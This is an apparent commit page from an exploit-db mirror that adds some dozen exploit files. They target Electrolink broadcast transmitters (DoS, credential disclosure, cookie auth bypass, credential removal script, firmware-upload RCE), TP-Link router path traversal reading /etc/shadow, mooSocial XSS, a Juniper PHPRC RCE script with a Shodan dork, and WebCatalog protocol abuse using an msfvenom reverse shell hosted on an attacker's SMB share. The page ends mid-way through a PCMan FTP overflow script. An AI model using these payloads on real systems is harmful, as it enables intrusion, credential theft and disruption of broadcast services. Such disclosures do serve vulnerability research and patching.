bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2024-02-03

Browse source 
14 changes to exploits/shellcodes/ghdb

Electrolink FM/DAB/TV Transmitter - Unauthenticated Remote DoS
Electrolink FM/DAB/TV Transmitter (controlloLogin.js) - Credentials Disclosure
Electrolink FM/DAB/TV Transmitter (Login Cookie) - Authentication Bypass
Electrolink FM/DAB/TV Transmitter (login.htm/mail.htm) - Credentials Disclosure
Electrolink FM/DAB/TV Transmitter - Pre-Auth MPFS Image Remote Code Execution
Electrolink FM/DAB/TV Transmitter - Remote Authentication Removal
TP-LINK TL-WR740N - Multiple HTML Injection
TP-Link TL-WR740N - UnAuthenticated Directory Transversal

Juniper-SRX-Firewalls&EX-switches - (PreAuth-RCE) (PoC)

mooSocial 3.1.8 - Cross-Site Scripting (XSS) on User Login Page

PCMan FTP Server 2.0 - 'pwd' Remote Buffer Overflow

WebCatalog 48.4 - Arbitrary Protocol Execution
This commit is contained in:
Exploit-DB 2024-02-03 00:16:34 +00:00
parent 2aed99237c
commit 81ae91fdae
14 changed files with 945 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

82
exploits/hardware/dos/51774.txt Normal file
View file

@ -0,0 +1,82 @@
Electrolink FM/DAB/TV Transmitter Unauthenticated Remote DoS
Vendor: Electrolink s.r.l.
Product web page: https://www.electrolink.com
Affected version: 10W, 100W, 250W, Compact DAB Transmitter
500W, 1kW, 2kW Medium DAB Transmitter
2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter
100W, 500W, 1kW, 2kW Compact FM Transmitter
3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter
15W - 40kW Digital FM Transmitter
BI, BIII VHF TV Transmitter
10W - 5kW UHF TV Transmitter
Web version: 01.09, 01.08, 01.07
Display version: 1.4, 1.2
Control unit version: 01.06, 01.04, 01.03
Firmware version: 2.1
Summary: Since 1990 Electrolink has been dealing with design and
manufacturing of advanced technologies for radio and television
broadcasting. The most comprehensive products range includes: FM
Transmitters, DAB Transmitters, TV Transmitters for analogue and
digital multistandard operation, Bandpass Filters (FM, DAB, ATV,
DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial
switches, Manual patch panels, RF power meters, Rigid line and
accessories. A professional solution that meets broadcasters needs
from small community television or radio to big government networks.
Compact DAB Transmitters 10W, 100W and 250W models with 3.5"
touch-screen display and in-built state of the art DAB modulator,
EDI input and GPS receiver. All transmitters are equipped with a
state-of-the art DAB modulator with excellent performances,
self-protected and self-controlled amplifiers ensure trouble-free
non-stop operation.
100W, 500W, 1kW and 2kW power range available on compact 2U and
3U 19" frame. Built-in stereo coder, touch screen display and
efficient low noise air cooling system. Available models: 3kW,
5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters
with fully broadband solid state amplifiers and an efficient
low-noise air cooling system.
FM digital modulator with excellent specifications, built-in
stereo and RDS coder. Digital deviation limiter together with
ASI and SDI inputs are available. These transmitters are ready
for ISOFREQUENCY networks.
Available for VHF BI and VHF BIII operation with robust desing
and user-friendly local and remote control. Multi-standard UHF
TV transmitters from 10W up to 5kW with efficient low noise air
cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC
and ISDB-Tb available.
Desc: The transmitter is suffering from a Denial of Service (DoS)
scenario. An unauthenticated attacker can reset the board as well
as stop the transmitter operations by sending one GET request to
the command.cgi gateway.
Tested on: Mbedthis-Appweb/12.5.0
Mbedthis-Appweb/12.0.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Macedonian Information Security Research & Development Laboratory
Zero Science Lab - https://www.zeroscience.mk - @zeroscience
Advisory ID: ZSL-2023-5795
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5795.php
30.06.2023
--
C:\>curl -s http://192.168.150.77:8888/command.cgi?web=r (reset board)
Success! OK
C:\>curl -s http://192.168.150.77:8888/command.cgi?web=K (stop)
Success! OK
C:\>curl -s http://192.168.150.77:8888/command.cgi?web=J (start)
Success! OK

56
exploits/hardware/webapps/51768.txt Normal file
View file

@ -0,0 +1,56 @@
# Exploit Title: TP-Link TL-WR740N UnAuthenticated Directory Transversal
# Date: 25/9/2023
# Exploit Author: Syed Affan Ahmed (ZEROXINN)
# Vendor Homepage: http://www.tp-link.com
# Version: TP-Link TL-WR740n 3.12.11 Build 110915 Rel.40896n
# Tested on: TP-Link TL-WR740N
---------------------------POC---------------------------
Request
-------
GET /help/../../../etc/shadow HTTP/1.1
Host: 192.168.0.1:8082
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: ipaddr=192.168.0.100; mLangage=žée; exception=4
Connection: close
Response
--------
HTTP/1.1 200 OK
Server: Router Webserver
Connection: close
WWW-Authenticate: Basic realm="TP-LINK Wireless Lite N Router WR740N"
Content-Type: text/html
<META http-equiv=Content-Type content="text/html; charset=iso-8859-1">
<HTML>
<HEAD><TITLE>TL-WR740N</TITLE>
<META http-equiv=Pragma content=no-cache>
<META http-equiv=Expires content="wed, 26 Feb 1997 08:21:57 GMT">
<LINK href="/dynaform/css_help.css" rel=stylesheet type="text/css">
<SCRIPT language="javascript" type="text/javascript"><!--
if(window.parent == window){window.location.href="http://192.168.0.1";}
function Click(){ return false;}
document.oncontextmenu=Click;
function doPrev(){history.go(-1);}
//--></SCRIPT>
root:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::
Admin:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::
bin::10933:0:99999:7:::
daemon::10933:0:99999:7:::
adm::10933:0:99999:7:::
lp:*:10933:0:99999:7:::
sync:*:10933:0:99999:7:::
shutdown:*:10933:0:99999:7:::
halt:*:10933:0:99999:7:::
uucp:*:10933:0:99999:7:::
operator:*:10933:0:99999:7:::
nobody::10933:0:99999:7:::
ap71::10933:0:99999:7:::

18
exploits/hardware/webapps/51769.txt Normal file
View file

@ -0,0 +1,18 @@
# Exploit Title: TP-LINK TL-WR740N - Multiple HTML Injection Vulnerabilities
# Date: 25/9/2023
# Exploit Author: Shujaat Amin (ZEROXINN)
# Vendor Homepage: http://www.tp-link.com
# Version: TP-Link TL-WR740n 3.12.11 Build 110915 Rel.40896n
# Tested on: Windows 10
---------------------------POC-----------------------------
1) Go to your routers IP (192.168.0.1)
2) Go to Access control --> Target,rule
3) Click on add new
5) Type <h1>Hello<h1> in Target Description box
6) Click on Save, and now you can see html injection on the webpage

83
exploits/hardware/webapps/51770.txt Normal file
View file

@ -0,0 +1,83 @@
Electrolink FM/DAB/TV Transmitter (login.htm/mail.htm) Credentials Disclosure
Vendor: Electrolink s.r.l.
Product web page: https://www.electrolink.com
Affected version: 10W, 100W, 250W, Compact DAB Transmitter
500W, 1kW, 2kW Medium DAB Transmitter
2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter
100W, 500W, 1kW, 2kW Compact FM Transmitter
3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter
15W - 40kW Digital FM Transmitter
BI, BIII VHF TV Transmitter
10W - 5kW UHF TV Transmitter
Web version: 01.09, 01.08, 01.07
Display version: 1.4, 1.2
Control unit version: 01.06, 01.04, 01.03
Firmware version: 2.1
Summary: Since 1990 Electrolink has been dealing with design and
manufacturing of advanced technologies for radio and television
broadcasting. The most comprehensive products range includes: FM
Transmitters, DAB Transmitters, TV Transmitters for analogue and
digital multistandard operation, Bandpass Filters (FM, DAB, ATV,
DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial
switches, Manual patch panels, RF power meters, Rigid line and
accessories. A professional solution that meets broadcasters needs
from small community television or radio to big government networks.
Compact DAB Transmitters 10W, 100W and 250W models with 3.5"
touch-screen display and in-built state of the art DAB modulator,
EDI input and GPS receiver. All transmitters are equipped with a
state-of-the art DAB modulator with excellent performances,
self-protected and self-controlled amplifiers ensure trouble-free
non-stop operation.
100W, 500W, 1kW and 2kW power range available on compact 2U and
3U 19" frame. Built-in stereo coder, touch screen display and
efficient low noise air cooling system. Available models: 3kW,
5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters
with fully broadband solid state amplifiers and an efficient
low-noise air cooling system.
FM digital modulator with excellent specifications, built-in
stereo and RDS coder. Digital deviation limiter together with
ASI and SDI inputs are available. These transmitters are ready
for ISOFREQUENCY networks.
Available for VHF BI and VHF BIII operation with robust desing
and user-friendly local and remote control. Multi-standard UHF
TV transmitters from 10W up to 5kW with efficient low noise air
cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC
and ISDB-Tb available.
Desc: The device is vulnerable to a disclosure of clear-text
credentials in login.htm and mail.htm that can allow security
bypass and system access.
Tested on: Mbedthis-Appweb/12.5.0
Mbedthis-Appweb/12.0.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Macedonian Information Security Research & Development Laboratory
Zero Science Lab - https://www.zeroscience.mk - @zeroscience
Advisory ID: ZSL-2023-XXXX
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-xxxx.php
30.06.2023
--
C:\>curl -s "http://192.168.150.77:8888/login.htm" | findstr /spina:d "passw"
55:<td class=cd31>Admin password</td>
56:<td class=cd32><input type=password name=adminpassword value="cozzir" tabindex=2 style="width: 95%" maxlength="30"/></td>
63:<td class=cd31>Guest password</td>
64:<td class=cd32><input type=password name=guestpassword value="guest" tabindex=4 style="width: 95%" maxlength="30"/></td>
C:\>curl -s http://192.168.150.77:8888/mail.htm | findstr /spina:d "passw"
93:<td class=cd31>Server password</td>
94:<td class=cd32><input type=password name=password value="t00tw00t" tabindex=4 style="width: 95%" maxlength="40"/></td>

90
exploits/hardware/webapps/51771.txt Normal file
View file

@ -0,0 +1,90 @@
Electrolink FM/DAB/TV Transmitter (controlloLogin.js) Credentials Disclosure
Vendor: Electrolink s.r.l.
Product web page: https://www.electrolink.com
Affected version: 10W, 100W, 250W, Compact DAB Transmitter
500W, 1kW, 2kW Medium DAB Transmitter
2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter
100W, 500W, 1kW, 2kW Compact FM Transmitter
3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter
15W - 40kW Digital FM Transmitter
BI, BIII VHF TV Transmitter
10W - 5kW UHF TV Transmitter
Web version: 01.09, 01.08, 01.07
Display version: 1.4, 1.2
Control unit version: 01.06, 01.04, 01.03
Firmware version: 2.1
Summary: Since 1990 Electrolink has been dealing with design and
manufacturing of advanced technologies for radio and television
broadcasting. The most comprehensive products range includes: FM
Transmitters, DAB Transmitters, TV Transmitters for analogue and
digital multistandard operation, Bandpass Filters (FM, DAB, ATV,
DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial
switches, Manual patch panels, RF power meters, Rigid line and
accessories. A professional solution that meets broadcasters needs
from small community television or radio to big government networks.
Compact DAB Transmitters 10W, 100W and 250W models with 3.5"
touch-screen display and in-built state of the art DAB modulator,
EDI input and GPS receiver. All transmitters are equipped with a
state-of-the art DAB modulator with excellent performances,
self-protected and self-controlled amplifiers ensure trouble-free
non-stop operation.
100W, 500W, 1kW and 2kW power range available on compact 2U and
3U 19" frame. Built-in stereo coder, touch screen display and
efficient low noise air cooling system. Available models: 3kW,
5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters
with fully broadband solid state amplifiers and an efficient
low-noise air cooling system.
FM digital modulator with excellent specifications, built-in
stereo and RDS coder. Digital deviation limiter together with
ASI and SDI inputs are available. These transmitters are ready
for ISOFREQUENCY networks.
Available for VHF BI and VHF BIII operation with robust desing
and user-friendly local and remote control. Multi-standard UHF
TV transmitters from 10W up to 5kW with efficient low noise air
cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC
and ISDB-Tb available.
Desc: The device is vulnerable to a disclosure of clear-text
credentials in controlloLogin.js that can allow security
bypass and system access.
Tested on: Mbedthis-Appweb/12.5.0
Mbedthis-Appweb/12.0.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Macedonian Information Security Research & Development Laboratory
Zero Science Lab - https://www.zeroscience.mk - @zeroscience
Advisory ID: ZSL-2023-5790
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5790.php
30.06.2023
--
C:\>curl -s "http://192.168.150.77:8888/controlloLogin.js"
function verifica() {
var user = document.getElementById('user').value;
var password = document.getElementById('password').value;
//alert(user);
if(user=='admin' && password=='cozzir'){
SetCookie('Login','OK',exp);
window.location.replace("FrameSetCore.html");
}else{
SetCookie('Login','NO',exp);
window.location.replace("login.html");
}
}

77
exploits/hardware/webapps/51772.txt Normal file
View file

@ -0,0 +1,77 @@
Electrolink FM/DAB/TV Transmitter (Login Cookie) Authentication Bypass
Vendor: Electrolink s.r.l.
Product web page: https://www.electrolink.com
Affected version: 10W, 100W, 250W, Compact DAB Transmitter
500W, 1kW, 2kW Medium DAB Transmitter
2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter
100W, 500W, 1kW, 2kW Compact FM Transmitter
3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter
15W - 40kW Digital FM Transmitter
BI, BIII VHF TV Transmitter
10W - 5kW UHF TV Transmitter
Web version: 01.09, 01.08, 01.07
Display version: 1.4, 1.2
Control unit version: 01.06, 01.04, 01.03
Firmware version: 2.1
Summary: Since 1990 Electrolink has been dealing with design and
manufacturing of advanced technologies for radio and television
broadcasting. The most comprehensive products range includes: FM
Transmitters, DAB Transmitters, TV Transmitters for analogue and
digital multistandard operation, Bandpass Filters (FM, DAB, ATV,
DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial
switches, Manual patch panels, RF power meters, Rigid line and
accessories. A professional solution that meets broadcasters needs
from small community television or radio to big government networks.
Compact DAB Transmitters 10W, 100W and 250W models with 3.5"
touch-screen display and in-built state of the art DAB modulator,
EDI input and GPS receiver. All transmitters are equipped with a
state-of-the art DAB modulator with excellent performances,
self-protected and self-controlled amplifiers ensure trouble-free
non-stop operation.
100W, 500W, 1kW and 2kW power range available on compact 2U and
3U 19" frame. Built-in stereo coder, touch screen display and
efficient low noise air cooling system. Available models: 3kW,
5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters
with fully broadband solid state amplifiers and an efficient
low-noise air cooling system.
FM digital modulator with excellent specifications, built-in
stereo and RDS coder. Digital deviation limiter together with
ASI and SDI inputs are available. These transmitters are ready
for ISOFREQUENCY networks.
Available for VHF BI and VHF BIII operation with robust desing
and user-friendly local and remote control. Multi-standard UHF
TV transmitters from 10W up to 5kW with efficient low noise air
cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC
and ISDB-Tb available.
Desc: The transmitter is vulnerable to an authentication bypass
vulnerability affecting the Login Cookie. An attacker can set
an arbitrary value except 'NO' to the Login Cookie and have
full system access.
Tested on: Mbedthis-Appweb/12.5.0
Mbedthis-Appweb/12.0.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Macedonian Information Security Research & Development Laboratory
Zero Science Lab - https://www.zeroscience.mk - @zeroscience
Advisory ID: ZSL-2023-5791
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5791.php
30.06.2023
--
C:\>curl -s "http://192.168.150.77:8888/home.htm" -H "Cookie: Login=ADMIN"

115
exploits/hardware/webapps/51773.py Executable file
View file

@ -0,0 +1,115 @@
#!/usr/bin/env python
#
#
# Electrolink FM/DAB/TV Transmitter Remote Authentication Removal
#
#
# Vendor: Electrolink s.r.l.
# Product web page: https://www.electrolink.com
# Affected version: 10W, 100W, 250W, Compact DAB Transmitter
# 500W, 1kW, 2kW Medium DAB Transmitter
# 2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter
# 100W, 500W, 1kW, 2kW Compact FM Transmitter
# 3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter
# 15W - 40kW Digital FM Transmitter
# BI, BIII VHF TV Transmitter
# 10W - 5kW UHF TV Transmitter
# Web version: 01.09, 01.08, 01.07
# Display version: 1.4, 1.2
# Control unit version: 01.06, 01.04, 01.03
# Firmware version: 2.1
#
# Summary: Since 1990 Electrolink has been dealing with design and
# manufacturing of advanced technologies for radio and television
# broadcasting. The most comprehensive products range includes: FM
# Transmitters, DAB Transmitters, TV Transmitters for analogue and
# digital multistandard operation, Bandpass Filters (FM, DAB, ATV,
# DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial
# switches, Manual patch panels, RF power meters, Rigid line and
# accessories. A professional solution that meets broadcasters needs
# from small community television or radio to big government networks.
#
# Compact DAB Transmitters 10W, 100W and 250W models with 3.5"
# touch-screen display and in-built state of the art DAB modulator,
# EDI input and GPS receiver. All transmitters are equipped with a
# state-of-the art DAB modulator with excellent performances,
# self-protected and self-controlled amplifiers ensure trouble-free
# non-stop operation.
#
# 100W, 500W, 1kW and 2kW power range available on compact 2U and
# 3U 19" frame. Built-in stereo coder, touch screen display and
# efficient low noise air cooling system. Available models: 3kW,
# 5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters
# with fully broadband solid state amplifiers and an efficient
# low-noise air cooling system.
#
# FM digital modulator with excellent specifications, built-in
# stereo and RDS coder. Digital deviation limiter together with
# ASI and SDI inputs are available. These transmitters are ready
# for ISOFREQUENCY networks.
#
# Available for VHF BI and VHF BIII operation with robust desing
# and user-friendly local and remote control. Multi-standard UHF
# TV transmitters from 10W up to 5kW with efficient low noise air
# cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC
# and ISDB-Tb available.
#
# Desc: The application is vulnerable to an unauthenticated
# parameter manipulation that allows an attacker to set the
# credentials to blank giving her access to the admin panel.
# Also vulnerable to account takeover and arbitrary password
# change.
#
# Tested on: Mbedthis-Appweb/12.5.0
# Mbedthis-Appweb/12.0.0
#
#
# Vulnerability discovered by Neurogenesia
# Macedonian Information Security Research & Development Laboratory
# Zero Science Lab - https://www.zeroscience.mk - @zeroscience
#
#
# Advisory ID: ZSL-2023-5792
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5792.php
#
#
# 30.06.2023
#
#
import datetime
import requests
dt = datetime.datetime.now()
dt = dt.strftime('%d.%m.%Y %H:%M:%S')
nul = ''
print('Starting transmitter exploit at', dt)
ip = input('Enter transmitter ip: ')
if 'http' not in ip:
ip = 'http://' + ip
ep = '/login.htm'
url = ip + ep
signature = {'Accept-Encoding' : 'gzip, deflate',
'Accept-Language' : 'ku-MK,en;q=0.1806',
'User-Agent' : 'Broadcastso/B.B',
'Connection' : 'keep-alive'
}
# ----------------- Line breaker v0.17 -----------------
postd = { 'adminuser' : nul,
'guestuser' : nul,
'adminpassword' : nul,
'guestpassword' : nul
}
print('Removing security control...')
r = requests.post(url, data = postd, headers = signature)
if r.status_code == 200:
print('Done. Go and "Login".')
else:
print('Error')
exit(-4)

146
exploits/hardware/webapps/51775.txt Normal file
View file

@ -0,0 +1,146 @@
Electrolink FM/DAB/TV Transmitter Pre-Auth MPFS Image Remote Code Execution
Vendor: Electrolink s.r.l.
Product web page: https://www.electrolink.com
Affected version: 10W, 100W, 250W, Compact DAB Transmitter
500W, 1kW, 2kW Medium DAB Transmitter
2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter
100W, 500W, 1kW, 2kW Compact FM Transmitter
3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter
15W - 40kW Digital FM Transmitter
BI, BIII VHF TV Transmitter
10W - 5kW UHF TV Transmitter
Web version: 01.09, 01.08, 01.07
Display version: 1.4, 1.2
Control unit version: 01.06, 01.04, 01.03
Firmware version: 2.1
Summary: Since 1990 Electrolink has been dealing with design and
manufacturing of advanced technologies for radio and television
broadcasting. The most comprehensive products range includes: FM
Transmitters, DAB Transmitters, TV Transmitters for analogue and
digital multistandard operation, Bandpass Filters (FM, DAB, ATV,
DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial
switches, Manual patch panels, RF power meters, Rigid line and
accessories. A professional solution that meets broadcasters needs
from small community television or radio to big government networks.
Compact DAB Transmitters 10W, 100W and 250W models with 3.5"
touch-screen display and in-built state of the art DAB modulator,
EDI input and GPS receiver. All transmitters are equipped with a
state-of-the art DAB modulator with excellent performances,
self-protected and self-controlled amplifiers ensure trouble-free
non-stop operation.
100W, 500W, 1kW and 2kW power range available on compact 2U and
3U 19" frame. Built-in stereo coder, touch screen display and
efficient low noise air cooling system. Available models: 3kW,
5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters
with fully broadband solid state amplifiers and an efficient
low-noise air cooling system.
FM digital modulator with excellent specifications, built-in
stereo and RDS coder. Digital deviation limiter together with
ASI and SDI inputs are available. These transmitters are ready
for ISOFREQUENCY networks.
Available for VHF BI and VHF BIII operation with robust desing
and user-friendly local and remote control. Multi-standard UHF
TV transmitters from 10W up to 5kW with efficient low noise air
cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC
and ISDB-Tb available.
Desc: The device allows access to an unprotected endpoint that
allows MPFS File System binary image upload without authentication.
The MPFS2 file system module provides a light-weight read-only
file system that can be stored in external EEPROM, external
serial Flash, or internal Flash program memory. This file system
serves as the basis for the HTTP2 web server module, but is also
used by the SNMP module and is available to other applications
that require basic read-only storage capabilities. This can be
exploited to overwrite the flash program memory that holds the
web server's main interfaces and execute arbitrary code.
Tested on: Mbedthis-Appweb/12.5.0
Mbedthis-Appweb/12.0.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Macedonian Information Security Research & Development Laboratory
Zero Science Lab - https://www.zeroscience.mk - @zeroscience
Advisory ID: ZSL-2023-5796
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5796.php
Ref: https://documentation.help/Microchip-TCP.IP-Stack/GS-MPFSUpload.html
30.06.2023
--
POST /upload HTTP/1.1
Host: 192.168.150.77:8888
Content-Length: 251
Cache-Control: max-age=0
Content-Type: multipart/form-data; boundary=----joxypoxy
User-Agent: MPFS2_PoC/1.0c
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: Login=IgnoreMePlsKtnx
Connection: close
------joxypoxy
Content-Disposition: form-data; name="i"; filename="MPFSimg.bin"
Content-Type: application/octet-stream
MPFS...<CGI BINARY PHONE HOME>
-----joxypoxy--
HTTP/1.1 200 OK
Connection: close
Content-Type: text/html
<html><body style="margin:100px"><b>MPFS Update Successful</b><p><a href="/">Site main page</a></body></html>
---
hd htm:
0d 0a 4d 50 46 53 02 01 01 00 8a 43 20 00 00 00 MPFS.......C....
2b 00 00 00 30 00 00 00 02 44 eb 64 00 00 00 00 +...0....D.d....
00 00 69 6e 64 65 78 32 2e 68 74 6d 00 3c 68 74 ..index0.htm.<ht
6d 6c 3e 0d 0a 3c 74 69 74 6c 65 3e 5a 53 4c 3c ml>..<title>ZSL<
...
...
64 6f 73 21 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 2d dos!..</html>..-
---
MPFS Structure:
[M][P][F][S]
[BYTE Ver Hi][BYTE Ver Lo][WORD Number of Files]
[Name Hash 0][Name Hash 1]...[Name Hash N]
[File Record 0][File Record 1]...[File Record N]
[String 0][String 1]...[String N]
[File Data 0][File Data 1]...[File Data N]
---
C:\>javaw -jar MPFS2.jar
C:\>mpfs2 -v -l MPFSimg.bin
Version: 2.1
Number of files: 1 (1 regular, 0 index)
Number of dynamic variables: 0
FileRecord 0:
.StringPtr = 32 index0.htm
.DataPtr = 43
.Len = 48
.Timestamp = 2023-08-27T14:39:30Z
.Flags = 0

31
exploits/php/webapps/51766.txt Normal file
View file

@ -0,0 +1,31 @@
# Exploit Title: mooSocial 3.1.8 - Cross-Site Scripting (XSS) on User Login Page
# Date: 26 September 2023
# Exploit Author: Astik Rawat (ahrixia)
# Vendor Homepage: https://moosocial.com
# Software Link: https://travel.moosocial.com/
# Version: 3.1.8
# Tested on: Windows 11
# CVE : CVE-2023-43325
Description:
A Cross Site Scripting (XSS) vulnerability exists on the user login page in mooSocial which is a social network website.
Steps to exploit:
1) Go to Login page on the website and login with credentials.
2) Insert your payload in the "data[redirect_url]" - POST Request
Proof of concept (Poc):
The following payload will allow you to execute XSS -
Payload (Plain text):
test"><img src=a onerror=alert(1)>test
Payload (Base64 encoded) :
dGVzdCI+PGltZyBzcmM9YSBvbmVycm9yPWFsZXJ0KDEpPnRlc3Q=
Final Payload (Base64+Url encoded):
dGVzdCI%2bPGltZyBzcmM9YSBvbmVycm9yPWFsZXJ0KDEpPnRlc3Q%3d%3d
POST Request on /moosocial/users/login (POST REQUEST DATA ONLY):
[_method=POST&data%5Bredirect_url%5D=dGVzdCI%2bPGltZyBzcmM9YSBvbmVycm9yPWFsZXJ0KDEpPnRlc3Q%3d%3d&data%5BUser%5D%5Bid%5D=&data%5BUser%5D%5Bemail%5D=admin%40localhost.com&data%5BUser%5D%5Bpassword%5D=pas[redacted]&data%5Bremember%5D=0]

76
exploits/php/webapps/51776.py Executable file
View file

@ -0,0 +1,76 @@
# ***************************************************************************************************
# Exploit Title: juniper-SRX-Firewalls&EX-switches (PreAuth-RCE) (PoC)
# Description:
#
# This code serves as both a vulnerability detector and a proof of concept for CVE-2023-36845.
# It executes the phpinfo() function on the login page of the target device,
# allowing to inspect the PHP configuration. also this script has the option to save the phpinfo()
# output to a file for further analysis.
#
# Shodan Dork: http.favicon.hash:2141724739
# Date: 2023/10/01
# Exploit Author: whiteOwl (whiteowl.pub@gmail.com)
# Vendor Homepage: https://whiteowl-pub.github.io
# Version: Versions Prior to 20.4R3-S9,21.1R1,21.2R3-S7,21.3R3-S5,
# 21.4R3-S5,22.1R3-S4,22.2R3-S2,22.3R2-S2/R3-S1,22.
# 4R2-S1/R3,23.2R1-S1/R2
# Tested on: JUNOS SM804122pri 15.1X49-D170.4
# CVE : cve-2023-36845
# ***************************************************************************************************
import argparse
import requests
banner = """
*************************************************************
* CVE-2023-36845 Vulnerability Detector & Proof of concept *
* This script checks for the CVE-2023-36845 vulnerability *
* and run phpinfo() on vulnerable devices. *
* If you suspect a vulnerable system, please take action *
* immediately to secure it. *
* *
* Author: whiteowl *
*************************************************************
"""
def send_request(url, output_file=None, verbose=False):
target_url = f"{url}/?PHPRC=/dev/fd/0"
data = 'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD8KICAgcGhwaW5mbygpOwo/Pg=="'
headers = {
'User-Agent': 'Mozilla/5.0',
}
try:
response = requests.post(target_url, headers=headers, data=data, stream=True)
if response.status_code == 200:
print("The Target Device is Vulnerable to: CVE-2023-36845")
else:
print("Not Vulnerable: Status Code", response.status_code)
if output_file:
with open(output_file, 'w', encoding='utf-8') as file:
file.write(response.text)
if verbose:
print(f"HTTP Status Code: {response.status_code}")
print("Response Headers:")
for header, value in response.headers.items():
print(f"{header}: {value}")
print("Response Content:")
print(response.text)
except requests.exceptions.RequestException as e:
print(f"An error occurred: {e}")
def main():
print(banner)
parser = argparse.ArgumentParser(description="Custom curl-like script")
parser.add_argument("-u", "--url", required=True, help="URL to send the HTTP request")
parser.add_argument("-o", "--output", help="Output file to save the HTML content")
parser.add_argument("-v", "--verbose", action="store_true", help="Enable verbose mode")
args = parser.parse_args()
send_request(args.url, args.output, args.verbose)
if __name__ == "__main__":
main()

40
exploits/windows/remote/51765.txt Normal file
View file

@ -0,0 +1,40 @@
# Exploit Title: WebCatalog 48.4 - Arbitrary Protocol Execution
# Date: 9/27/2023
# Exploit Author: ItsSixtyN3in
# Vendor Homepage: https://webcatalog.io/en/
# Software Link: https://cdn-2.webcatalog.io/webcatalog/WebCatalog%20Setup%2052.3.0.exe
# Version: 48.4.0
# Tested on: Windows
# CVE : CVE-2023-42222
Vulnerability summary:
WebCatalog before version 48.8 calls the Electron shell.openExternal function without verifying that the URL is for an http or https resource. This vulnerability allows an attacker to potentially execute code through arbitrary protocols on the victims machine by having users sync pages with malicious URLs. The victim has to interact with the link, which can then enable an attacker to bypass security measures for malicious file delivery.
Exploit details:
- Create a reverse shell file.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > reverse.exe
- Host a reverse shell file (or otherwise) on your own SMB share using impacket (https://github.com/fortra/impacket/blob/master/examples/smbserver.py)
python3 smbserver.py Tools -smb2support
- Have the user sync a page with the payload as a renamed link
[Friendly Link](Search-ms://query=<FileName>&crumb=location\\<attackerIP>\<attackerSMBShare>&displayname=Spoofed%20Windows%20Title)
Payload:
search-ms://query=<FileName>&crumb=location\\<attackerIP>\<attackerSMBShare>&displayname=Spoofed%20Windows%20Title
Tobias Diehl
Security Consultant
OSCP, CRTO, CEH, PenTest+, AZ-500, SC-200/300
Pronouns: he/him
e-mail: tobias.diehl@bulletproofsi.com

65
exploits/windows/remote/51767.py Executable file
View file

@ -0,0 +1,65 @@
# Exploit Title: PCMan FTP Server 2.0 - 'pwd' Remote Buffer Overflow
# Date: 09/25/2023
# Exploit Author: Waqas Ahmed Faroouqi (ZEROXINN)
# Vendor Homepage: http://pcman.openfoundry.org/
# Software Link: https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z
# Version: 2.0
# Tested on: Windows XP SP3
#!/usr/bin/python
import socket
#buffer = 'A' * 2500
